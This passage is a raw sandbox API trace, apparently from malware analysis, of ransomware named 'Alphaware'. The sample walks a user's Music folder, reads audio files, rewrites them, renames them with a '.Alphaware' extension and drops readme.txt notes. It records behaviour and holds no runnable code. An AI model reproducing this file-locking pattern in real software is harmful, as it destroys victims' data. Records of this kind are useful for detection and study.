ftLastWriteTime.dwLowDateTime=0x22371e00, ftLastWriteTime.dwHighDateTime=0x1d975dd, nFileSizeHigh=0x0, nFileSizeLow=0xc09e)) returned 1 [0087.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0087.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0087.126] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\qoDFdF- OjUNXs8zmjC.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\qodfdf- ojunxs8zmjc.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0087.127] ReadFile (in: hFile=0x254, lpBuffer=0x23f1700, nNumberOfBytesToRead=0xc09e, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x23f1700*, lpNumberOfBytesRead=0x23eb38*=0xc09e, lpOverlapped=0x0) returned 1 [0087.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0087.148] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\qoDFdF- OjUNXs8zmjC.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\qodfdf- ojunxs8zmjc.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0087.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0087.152] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\qoDFdF- OjUNXs8zmjC.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\qodfdf- ojunxs8zmjc.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb29cd10, ftCreationTime.dwHighDateTime=0x1d96ffd, ftLastAccessTime.dwLowDateTime=0x22371e00, ftLastAccessTime.dwHighDateTime=0x1d975dd, ftLastWriteTime.dwLowDateTime=0x86250200, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x101a0)) returned 1 [0087.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0087.152] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\qoDFdF- OjUNXs8zmjC.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\qodfdf- ojunxs8zmjc.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\qoDFdF- OjUNXs8zmjC.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\qodfdf- ojunxs8zmjc.m4a.alphaware")) returned 1 [0087.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0087.153] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x86250200, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86250200, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.153] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6ccc5e0, ftCreationTime.dwHighDateTime=0x1d97188, ftLastAccessTime.dwLowDateTime=0xc2c34ca0, ftLastAccessTime.dwHighDateTime=0x1d9759b, ftLastWriteTime.dwLowDateTime=0xc2c34ca0, ftLastWriteTime.dwHighDateTime=0x1d9759b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5jdQ8S", cAlternateFileName="")) returned 1 [0087.153] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34bc6ee0, ftCreationTime.dwHighDateTime=0x1d96a07, ftLastAccessTime.dwLowDateTime=0xc1773de0, ftLastAccessTime.dwHighDateTime=0x1d96df6, ftLastWriteTime.dwLowDateTime=0xc1773de0, ftLastWriteTime.dwHighDateTime=0x1d96df6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8wsZ", cAlternateFileName="")) returned 1 [0087.153] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf2fad0, ftCreationTime.dwHighDateTime=0x1d9694d, ftLastAccessTime.dwLowDateTime=0x750f1fa0, ftLastAccessTime.dwHighDateTime=0x1d969db, ftLastWriteTime.dwLowDateTime=0x85fc8aa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x15334, dwReserved0=0x0, dwReserved1=0x0, cFileName="asl2ThVDjfYIFJk_MIxu.wav.Alphaware", cAlternateFileName="ASL2TH~1.ALP")) returned 1 [0087.153] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x86014d60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x374, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0087.153] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd33d76c0, ftCreationTime.dwHighDateTime=0x1d9696e, ftLastAccessTime.dwLowDateTime=0xdfbe3b50, ftLastAccessTime.dwHighDateTime=0x1d972ba, ftLastWriteTime.dwLowDateTime=0x860d3440, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fPmhr.wav.Alphaware", cAlternateFileName="FPMHRW~1.ALP")) returned 1 [0087.153] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d18cd10, ftCreationTime.dwHighDateTime=0x1d97595, ftLastAccessTime.dwLowDateTime=0x6b1eb5e0, ftLastAccessTime.dwHighDateTime=0x1d975b7, ftLastWriteTime.dwLowDateTime=0x8616b9c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3360, dwReserved0=0x0, dwReserved1=0x0, cFileName="HTD1 u2-LwYK0bzEph.m4a.Alphaware", cAlternateFileName="HTD1U2~1.ALP")) returned 1 [0087.153] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb9556b0, ftCreationTime.dwHighDateTime=0x1d96e1b, ftLastAccessTime.dwLowDateTime=0x5182aae0, ftLastAccessTime.dwHighDateTime=0x1d9709b, ftLastWriteTime.dwLowDateTime=0x861b7c80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5f34, dwReserved0=0x0, dwReserved1=0x0, cFileName="JtwiWA.m4a.Alphaware", cAlternateFileName="JTWIWA~1.ALP")) returned 1 [0087.153] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c77ae00, ftCreationTime.dwHighDateTime=0x1d9759c, ftLastAccessTime.dwLowDateTime=0x191a0d50, ftLastAccessTime.dwHighDateTime=0x1d97696, ftLastWriteTime.dwLowDateTime=0x86203f40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="QCDZICFDAJnNsJNJRg.m4a.Alphaware", cAlternateFileName="QCDZIC~1.ALP")) returned 1 [0087.153] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb29cd10, ftCreationTime.dwHighDateTime=0x1d96ffd, ftLastAccessTime.dwLowDateTime=0x22371e00, ftLastAccessTime.dwHighDateTime=0x1d975dd, ftLastWriteTime.dwLowDateTime=0x86250200, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x101a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qoDFdF- OjUNXs8zmjC.m4a.Alphaware", cAlternateFileName="QODFDF~1.ALP")) returned 1 [0087.153] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6580dbb0, ftCreationTime.dwHighDateTime=0x1d967dc, ftLastAccessTime.dwLowDateTime=0x7c4560d0, ftLastAccessTime.dwHighDateTime=0x1d97026, ftLastWriteTime.dwLowDateTime=0x7c4560d0, ftLastWriteTime.dwHighDateTime=0x1d97026, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RBnxFLdoe6j5FMDq", cAlternateFileName="RBNXFL~1")) returned 1 [0087.153] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85fc8aa0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x85fc8aa0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85fc8aa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0087.153] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85fc8aa0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x85fc8aa0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85fc8aa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0087.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0087.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0087.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0087.154] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6ccc5e0, ftCreationTime.dwHighDateTime=0x1d97188, ftLastAccessTime.dwLowDateTime=0xc2c34ca0, ftLastAccessTime.dwHighDateTime=0x1d9759b, ftLastWriteTime.dwLowDateTime=0xc2c34ca0, ftLastWriteTime.dwHighDateTime=0x1d9759b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.154] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1df35750, ftCreationTime.dwHighDateTime=0x1d9688b, ftLastAccessTime.dwLowDateTime=0x57dc6eb0, ftLastAccessTime.dwHighDateTime=0x1d972c8, ftLastWriteTime.dwLowDateTime=0x57dc6eb0, ftLastWriteTime.dwHighDateTime=0x1d972c8, nFileSizeHigh=0x0, nFileSizeLow=0xcf45, dwReserved0=0x0, dwReserved1=0x0, cFileName="bgaF98m.mp3", cAlternateFileName="")) returned 1 [0087.154] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bc00750, ftCreationTime.dwHighDateTime=0x1d97338, ftLastAccessTime.dwLowDateTime=0xf16ec1e0, ftLastAccessTime.dwHighDateTime=0x1d9764c, ftLastWriteTime.dwLowDateTime=0xf16ec1e0, ftLastWriteTime.dwHighDateTime=0x1d9764c, nFileSizeHigh=0x0, nFileSizeLow=0x18fcf, dwReserved0=0x0, dwReserved1=0x0, cFileName="hX1YQpkZK 4fEglyKr.mp3", cAlternateFileName="HX1YQP~1.MP3")) returned 1 [0087.154] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99135fa0, ftCreationTime.dwHighDateTime=0x1d96ce3, ftLastAccessTime.dwLowDateTime=0xb15f7f90, ftLastAccessTime.dwHighDateTime=0x1d97403, ftLastWriteTime.dwLowDateTime=0xb15f7f90, ftLastWriteTime.dwHighDateTime=0x1d97403, nFileSizeHigh=0x0, nFileSizeLow=0x69c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="rSuF1L1G3gyu.m4a", cAlternateFileName="RSUF1L~1.M4A")) returned 1 [0087.154] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x928c0660, ftCreationTime.dwHighDateTime=0x1d975de, ftLastAccessTime.dwLowDateTime=0x256f3330, ftLastAccessTime.dwHighDateTime=0x1d9760c, ftLastWriteTime.dwLowDateTime=0x256f3330, ftLastWriteTime.dwHighDateTime=0x1d9760c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="rZ3-_8o.wav", cAlternateFileName="")) returned 1 [0087.154] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54b89560, ftCreationTime.dwHighDateTime=0x1d973b8, ftLastAccessTime.dwLowDateTime=0x68bd07a0, ftLastAccessTime.dwHighDateTime=0x1d97645, ftLastWriteTime.dwLowDateTime=0x68bd07a0, ftLastWriteTime.dwHighDateTime=0x1d97645, nFileSizeHigh=0x0, nFileSizeLow=0x9929, dwReserved0=0x0, dwReserved1=0x0, cFileName="t3tMVJXbAaJh1K.mp3", cAlternateFileName="T3TMVJ~1.MP3")) returned 1 [0087.154] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44548380, ftCreationTime.dwHighDateTime=0x1d967f8, ftLastAccessTime.dwLowDateTime=0xf87f0c80, ftLastAccessTime.dwHighDateTime=0x1d9700a, ftLastWriteTime.dwLowDateTime=0xf87f0c80, ftLastWriteTime.dwHighDateTime=0x1d9700a, nFileSizeHigh=0x0, nFileSizeLow=0xf36e, dwReserved0=0x0, dwReserved1=0x0, cFileName="zMtEGOAU5-f.wav", cAlternateFileName="ZMTEGO~1.WAV")) returned 1 [0087.154] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0087.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0087.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0087.154] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\bgaF98m.mp3", dwFileAttributes=0x80) returned 1 [0087.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.155] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\bgaF98m.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\bgaf98m.mp3"), fInfoLevelId=0x0, lpFileInformation=0x24a0680 | out: lpFileInformation=0x24a0680*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1df35750, ftCreationTime.dwHighDateTime=0x1d9688b, ftLastAccessTime.dwLowDateTime=0x57dc6eb0, ftLastAccessTime.dwHighDateTime=0x1d972c8, ftLastWriteTime.dwLowDateTime=0x57dc6eb0, ftLastWriteTime.dwHighDateTime=0x1d972c8, nFileSizeHigh=0x0, nFileSizeLow=0xcf45)) returned 1 [0087.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.155] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\bgaF98m.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\bgaf98m.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.155] ReadFile (in: hFile=0x254, lpBuffer=0x24a08a8, nNumberOfBytesToRead=0xcf45, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a08a8*, lpNumberOfBytesRead=0x23ea98*=0xcf45, lpOverlapped=0x0) returned 1 [0087.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.178] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\bgaF98m.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\bgaf98m.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.182] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\bgaF98m.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\bgaf98m.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1df35750, ftCreationTime.dwHighDateTime=0x1d9688b, ftLastAccessTime.dwLowDateTime=0x57dc6eb0, ftLastAccessTime.dwHighDateTime=0x1d972c8, ftLastWriteTime.dwLowDateTime=0x8629c4c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11534)) returned 1 [0087.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.182] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\bgaF98m.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\bgaf98m.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\bgaF98m.mp3.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\bgaf98m.mp3.alphaware")) returned 1 [0087.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0087.183] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0087.185] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\hX1YQpkZK 4fEglyKr.mp3", dwFileAttributes=0x80) returned 1 [0087.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.187] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\hX1YQpkZK 4fEglyKr.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\hx1yqpkzk 4feglykr.mp3"), fInfoLevelId=0x0, lpFileInformation=0x25552a8 | out: lpFileInformation=0x25552a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6bc00750, ftCreationTime.dwHighDateTime=0x1d97338, ftLastAccessTime.dwLowDateTime=0xf16ec1e0, ftLastAccessTime.dwHighDateTime=0x1d9764c, ftLastWriteTime.dwLowDateTime=0xf16ec1e0, ftLastWriteTime.dwHighDateTime=0x1d9764c, nFileSizeHigh=0x0, nFileSizeLow=0x18fcf)) returned 1 [0087.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.187] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\hX1YQpkZK 4fEglyKr.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\hx1yqpkzk 4feglykr.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.188] ReadFile (in: hFile=0x254, lpBuffer=0x1294e150, nNumberOfBytesToRead=0x18fcf, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x1294e150*, lpNumberOfBytesRead=0x23ea98*=0x18fcf, lpOverlapped=0x0) returned 1 [0087.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.231] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\hX1YQpkZK 4fEglyKr.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\hx1yqpkzk 4feglykr.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.240] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\hX1YQpkZK 4fEglyKr.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\hx1yqpkzk 4feglykr.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bc00750, ftCreationTime.dwHighDateTime=0x1d97338, ftLastAccessTime.dwLowDateTime=0xf16ec1e0, ftLastAccessTime.dwHighDateTime=0x1d9764c, ftLastWriteTime.dwLowDateTime=0x86334a40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x215e0)) returned 1 [0087.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.240] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\hX1YQpkZK 4fEglyKr.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\hx1yqpkzk 4feglykr.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\hX1YQpkZK 4fEglyKr.mp3.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\hx1yqpkzk 4feglykr.mp3.alphaware")) returned 1 [0087.241] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\rSuF1L1G3gyu.m4a", dwFileAttributes=0x80) returned 1 [0087.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.241] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\rSuF1L1G3gyu.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\rsuf1l1g3gyu.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23d5388 | out: lpFileInformation=0x23d5388*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x99135fa0, ftCreationTime.dwHighDateTime=0x1d96ce3, ftLastAccessTime.dwLowDateTime=0xb15f7f90, ftLastAccessTime.dwHighDateTime=0x1d97403, ftLastWriteTime.dwLowDateTime=0xb15f7f90, ftLastWriteTime.dwHighDateTime=0x1d97403, nFileSizeHigh=0x0, nFileSizeLow=0x69c3)) returned 1 [0087.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.241] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\rSuF1L1G3gyu.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\rsuf1l1g3gyu.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.242] ReadFile (in: hFile=0x254, lpBuffer=0x23d55f0, nNumberOfBytesToRead=0x69c3, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23d55f0*, lpNumberOfBytesRead=0x23ea98*=0x69c3, lpOverlapped=0x0) returned 1 [0087.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.310] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\rSuF1L1G3gyu.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\rsuf1l1g3gyu.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.312] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\rSuF1L1G3gyu.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\rsuf1l1g3gyu.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99135fa0, ftCreationTime.dwHighDateTime=0x1d96ce3, ftLastAccessTime.dwLowDateTime=0xb15f7f90, ftLastAccessTime.dwHighDateTime=0x1d97403, ftLastWriteTime.dwLowDateTime=0x863ccfc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8de0)) returned 1 [0087.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.313] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\rSuF1L1G3gyu.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\rsuf1l1g3gyu.m4a"), 